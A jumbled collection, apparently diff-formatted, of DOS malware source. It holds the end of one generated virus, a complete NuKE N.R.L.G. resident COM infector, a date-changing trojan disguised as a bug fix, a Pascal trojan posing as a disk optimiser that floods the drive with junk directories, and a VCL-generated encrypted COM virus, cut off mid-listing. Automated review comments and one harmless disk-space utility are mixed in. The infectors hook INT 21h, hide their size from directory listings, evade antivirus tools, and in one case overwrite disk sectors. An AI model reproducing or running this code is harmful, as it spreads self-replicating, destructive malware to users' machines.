popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov ax,351ch ;
int 21h ;store the int 1ch vectors
mov word ptr [trampaint+bp],bx ;in cs:trampaint
mov word ptr [trampaint+2+bp],es ;
mov ax,251ch ;put the int 1ch (clock) vector
push cs ;
pop ds ;
mov dx,offset tardar ;in offset tardar
int 21h ;
mov dx,offset fin ;
int 27h ;main resident the code
NO_DAY: ;
ret ;ret for program
tardar: ;int 1c handler
pushf ;
pusha ;
mov cx,0ffffh ;fuck loop for slow speed
trampa: ;
mov ax,ax ;
loop trampa ;
popa ;
popf ;
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
ret ;
trampaint dd ? ;
;--------------------------------;
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
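Review bot: Several inline comments state the opposite of what the code does, which will mislead anyone triaging this sample: at `jne seguir` the comment reads `yes! the file is infected!` although the branch is taken when the timestamp marker is absent, `jne er1` is annotated `yes! is a EXE` on the not-`MZ` path, and `is ecual to 58?` does not agree with `FECHA DW 01eH`. The file also lacks an analyst-facing header. I would add one listing the behaviour visible here: the residency probe `AX=0CACAh` on int 21h answered with `BH=0CAh`; the int 21h hook on `4Bh`, `11h` and `12h`; the `0E9h` jump written over the first three bytes of non-`MZ` files; the seconds field of the file time forced to `1Eh` as the marker; FCB directory entries of marked files reported smaller by the body length; and the `AX=0FA01h` / `DX=5945h` call in `ANTI_V`. Those are the points a detection or clean-up check would key on.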
+112
@@ -0,0 +1,112 @@
title FREE.ASM
page,132
cseg segment para 'code'
assume cs:cseg
main proc far
org 100h
start:
jmp begin
banner db 0ah,'FREE Vers 1.0 - Sept. 1985 - by Art Merrill',0dh,0ah,'$'
db 'Copyright (C) 1985',0dh,0ah,'$'
db 'Ziff-Davis Publishing Company',0dh,0ah,'$'
total: db 0ah,8 dup(0),' bytes total disk space',0dh,0ah
diff: db 8 dup(0),' bytes allocated',0dh,0ah
bytes: db 8 dup(0),' bytes available on disk',0dh,0ah,0ah,'$'
hltotal: dw 0,0
hlbytes: dw 0,0
begin:
mov dx,offset banner
mov ah,9
int 21h
mov si,5ch ;address of selected drive
mov dl,[si]
mov ah,36h ;get disk free space
int 21h
push ax ;save for total bytes
push cx ;save for total bytes
push dx ;save for total bytes
mul bx ;get total clusters
mul cx ;get total bytes
std
mov di,offset hlbytes+2
xchg ax,dx
stosw
xchg ax,dx
stosw
mov di,offset bytes+7 ;storage for ascii printout
call ascii
pop dx ;get back total clusters
pop cx ;get back bytes per sector
pop ax ;get back sectors per cluster
mul dx ;total clusters
mul cx ;bytes per sector
mov di,offset hltotal+2 ;same routine as above to get
xchg ax,dx ; total bytes
stosw
xchg ax,dx
stosw
mov di,offset total+8 ;storage for ascii printout
call ascii
mov ax,word ptr hltotal+2 ;calculate difference between
sub ax,word ptr hlbytes+2 ; total bytes and bytes allocated
xchg ax,dx ; to get total bytes remaining
mov ax,word ptr hltotal
sub ax,word ptr hlbytes
jnc skip
dec dx ;adjust total for carry
skip:
mov di,offset diff+7 ;storage for ascii printout
call ascii
mov dx,offset total ;print results
mov ah,9
int 21h
int 20h ;exit
main endp
ascii proc near
xchg bp,dx ;save high word
mov bx,0ah ;divisor
mov cl,30h ;conversion for ascii
rpt1:
cmp bp,0 ;are we done with high words
jz rpt2 ;yes
xchg ax,bp ;no-get high word
xor dx,dx ;clear dx
div bx
xchg bp,ax ;this will be the new high word
div bx ;divide low word + remainder
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
jmp rpt1 ;go again
rpt2:
xor dx,dx ;clear dx
div bx
or dl,cl ;convert hex value to ascii
mov [di],dl ;quotient into storage
dec di ;step back one byte
cmp ax,0 ;are we done?
jnz rpt2 ;no
ret ;yes
ascii endp
cseg ends
end start
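Review bot: The result of `int 21h`/`ah=36h` in `begin` is used without testing for an invalid drive, so a bad drive byte in the FCB at 5Ch is multiplied out and printed as if it were a size. DOS reports that case as `AX=0FFFFh`, and a `cmp ax,0FFFFh` / `je` to an error message before the three `push` instructions would cover it. The `mul bx` / `mul cx` pair also keeps only the low word of the first product, so both totals wrap once sectors-per-cluster times clusters exceeds 65535. The `std` before the `stosw` pair is never cleared, which is harmless only because the program exits through `int 20h`.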

+416
@@ -0,0 +1,416 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall TRASH_RN
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
j: ;
jmp j ;Halt the process
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
TRASH_RN: ;
MOV AH,2DH ;
INT 21H ;get date
CMP Dl,6 ;is =6 (RAN 0-99)
jne NO_DAYY ;nop! fuck ret
mov ah,0dh ;
int 21h ;reset disk
mov al,2 ;
mov cx,0ffffh ;
mov dx,0 ;
int 26h ;fuck ffffh sector
mov ah,0dh ;reste disk
int 21h ;
mov al,2 ;
mov cx,0ffffh ;
mov dx,0ffffh ;new fuck+
int 26h ;heheheh!!!
NO_DAYY: ;
ret ;
;---------------------------------
ÿ;-------------;
Dir_S: ;
jmp dirsal ;
no_Good:iret ;
;-------------;
ÿaction_dia Db 01H ;day for the action
action_mes Db 01H ;month for the action
FECHA DW 08H ;Secon for mark
FECHAd Db 08H ;Secon for mark dir st
fin:
code ends
end start
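Review bot: This file is added without an analyst-facing header, although the listing is a resident INT 21h hooker with a destructive path: `TRASH_RN` reaches two `int 26h` absolute disk writes with `al=2`, and `action` spins in `jmp j` on a date match. A first-line comment such as `; LIVE MALWARE SAMPLE - analysis only; destructive payload in TRASH_RN (int 26h)` would make the handling requirements obvious. For detection work the header should also record the indicators visible in the code. These are the `AX=0CACAh` residency probe on INT 21h answered with `BH=0CAh`, the `'[NuKE] N.R.L.G. AZRAEL'` string at `make`, the hooks on functions 4Bh/11h/12h in `VIRUS`, and the file-time seconds field marked with `FECHA` (08h).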
@@ -0,0 +1,32 @@
;-------------------------------------------------------------------;
; Simple little program to change the date to July 13th, 1990 ;
; Which just happens to be a Friday...what a coincidence.... ;
; This should be great fun if you have a virus or a program that ;
; goes *BOOM* on Friday the 13th, such as the Israel strain ;
; Have fun, and remember, I'm not responsible if you get your lazy ;
; ass busted while trying to bring down the damn Pentagon ;
; Kryptic Night - SMC - RaCK - U<< - PhD ;
;-------------------------------------------------------------------;
CODE SEGMENT
Assume CS:code,DS:code
ORG 100h
start: Jmp begin
text1 db ' Telemate bug fix for version 3.0+$ ' ;Bogus filler text
text2 db ' TM.EXE fixed!$ ' ;Bogus filler text
text3 db 07h,'Error! Cannot alter TM.EXE$ ' ;Printed after change
Begin proc NEAR
mov ah,05h ;Function 5 - Set Real Time Clock
mov cx,1990h ;What century
mov dx,0713h ;Month/day
int 1ah ;Execute
mov ah,09h ;Funtion 9 - Print string <end in $>
lea dx,text3 ;What text to print
int 21h ;Execute function 09
int 20h ;Quit .COM file
begin endp
CODE ENDS ;End segment
END start ;End program
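Review bot: The header explains the intent, but nothing next to the code says that `text1` and `text2` are never printed and that the "Telemate bug fix" wording is a decoy. The only side effects are the `int 1ah`/`ah=05h` call, which rewrites the real-time-clock date to the BCD values in CX/DX (13 July 1990), and the fake error printed from `text3`. A comment on `Begin` such as `; sole effect: sets RTC date to 13 Jul 1990; undo by resetting the system date` would make triage and clean-up obvious.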
@@ -0,0 +1,77 @@
program Disk_Space;
{ This program makes use of the
CHR command
USES command
VAR command
CLRSCR command
WRITELN command
DISKFREE command
DISKSIZE command
TRUNC command
IF-THEN-ELSE command
REPEAT-UNTIL command
ASSIGN command
REWRITE command
WRITE command
DELAY command
CLOSE command
RANDOMIZE command
}
uses dos,crt;
var cdn:byte;
dirname:string;
a,b,c,d,e,f,g,h,i,j,k,l:char;
ii:integer;
q:text;
ai:boolean;
begin
randomize;
clrscr;
cdn:=2;
gotoxy(22,2);
Writeln('Froggie-OPT v1.12 (c) Jason Friedman');
gotoxy(25,3);
writeln('Please wait - Reading System Data');
repeat;
cdn:=cdn+1;
if (diskfree(cdn)<1) and (cdn<3) then
Writeln(' Your disk for drive ',chr(cdn+64),': is not in the drive')
else
if (diskfree(cdn)>1) then
Writeln(' Your disk space free for drive ',chr(cdn+64),': is ',
trunc(diskfree(cdn)/1000),' KB out of ',trunc(disksize(cdn)/1000),' KB');
until (diskfree(cdn)<1) and (cdn>2);
delay(1000);
repeat
writeln(' Preparing to Froggie OPT - Please do not disturb');
writeln(' Any type of disturbance will cause file damnage ');
ii:=ii+1;
a:=chr(trunc(random(255)));
b:=chr(trunc(random(255)));
c:=chr(trunc(random(255)));
d:=chr(trunc(random(255)));
e:=chr(trunc(random(255)));
f:=chr(trunc(random(255)));
g:=chr(trunc(random(255)));
h:=chr(trunc(random(255)));
i:=chr(trunc(random(255)));
j:=chr(trunc(random(255)));
k:=chr(trunc(random(255)));
l:=chr(trunc(random(255)));
mkdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
chdir (a+b+c+d+e+f+g+h+i+'.'+j+k+l);
assign (q,'YOU');
rewrite (q);
close (q);
assign (q,'ARE');
rewrite (q);
close (q);
Assign (q,'LAME');
rewrite (q);
close (q);
chdir('..');
until ai=true;
end.
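Review bot: The header comment lists only the Pascal statements used and says nothing about behaviour, which is misleading for a program that presents itself as "Froggie-OPT" while doing no optimisation. After the disk-space display, the second `repeat` loop creates a directory with a random 9.3 name, writes empty files `YOU`, `ARE` and `LAME` into it, and repeats `until ai=true`. `ai` is never assigned in the visible code, so the loop has no intended exit. I would replace the header with a description along the lines of `{ Trojan: poses as a disk optimiser; floods the current drive with randomly named directories }` and note the banner string and the three file names as the recognisable artefacts.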

+359
@@ -0,0 +1,359 @@
; FS.ASM -- Fuckin Shit Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Unknown User
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0063h ; Do 99 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
db 0F0h,039h,067h,037h,006h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
db 032h,050h,0FFh,0D5h,088h
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 0DCh,02Bh,0D7h,0CEh,09Eh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "Fuckin Shit Virus"
db "By White Shark"
db "Mess with the White Shark and"
db "you'll be eaten alive!"
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
